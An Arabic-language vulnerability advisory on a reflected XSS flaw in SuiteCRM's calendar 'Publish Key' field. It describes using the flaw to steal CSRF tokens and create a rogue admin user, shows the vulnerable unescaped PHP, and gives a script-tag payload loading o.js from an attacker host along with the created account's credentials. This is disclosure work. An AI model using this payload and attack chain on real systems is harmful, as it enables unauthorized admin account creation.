
ثغرة أمنية في SuiteCRM يمكن استغلالها لسرقة رموز CSRF وتنفيذ إجراءات غير مصرح بها، مثل إنشاء مستخدمين إداريين جدد دون مصادقة مناسبة.
حقل "Publish Key" في صفحة تعديل الملف الشخصي في SuiteCRM عرضة لثغرة XSS المنعكسة (Cross-Site Scripting)، مما يسمح للمهاجم بحقن كود JavaScript خبيث. يمكن استغلال ذلك لسرقة رموز CSRF وتنفيذ إجراءات غير مصرح بها، مثل إنشاء مستخدمين إداريين جدد دون مصادقة صحيحة.
تنشأ الثغرة بسبب عدم كفاية التحقق من صحة المدخلات وتنظيفها في حقل Publish Key داخل تطبيق SuiteCRM. عندما يقوم المهاجم بحقن سكربت خبيث، يتم تنفيذه في سياق جلسة المستخدم المصادق عليه. ثم يستغل السكربت المحقون (o.js) رمز CSRF الملتقط لتزوير طلبات تنشئ مستخدمين إداريين جدد، مما يعرض سلامة وأمان مثيل CRM للخطر.
تمثل هذه الثغرة مشكلة حرجة من نوع Cross-Site Scripting (XSS). ويشمل تأثيرها:
$publish_key = $this->bean->getPreference('calendar_publish_key');
$this->ss->assign('CALENDAR_PUBLISH_KEY', $publish_key);
$publish_url = $sugar_config['site_url'] . '/vcal_server.php';
$token = "/";
$publish_url .= $token . "type=vfb&source=outlook&key=<span id=\"cal_pub_key_span\">$publish_key</span>";
$ical_url = $sugar_config['site_url'] . "/ical_server.php?type=ics&key=<span id=\"ical_pub_key_span\">$publish_key</span>";
$this->ss->assign("CALENDAR_PUBLISH_URL", $publish_url);
$this->ss->assign("CALENDAR_ICAL_URL", $ical_url);
<script src=//localhost:1235/o.js>
Username - imposter
Password - ok
https://github.com/user-attachments/assets/cdf96f3d-7f61-4371-818b-e344efdcd197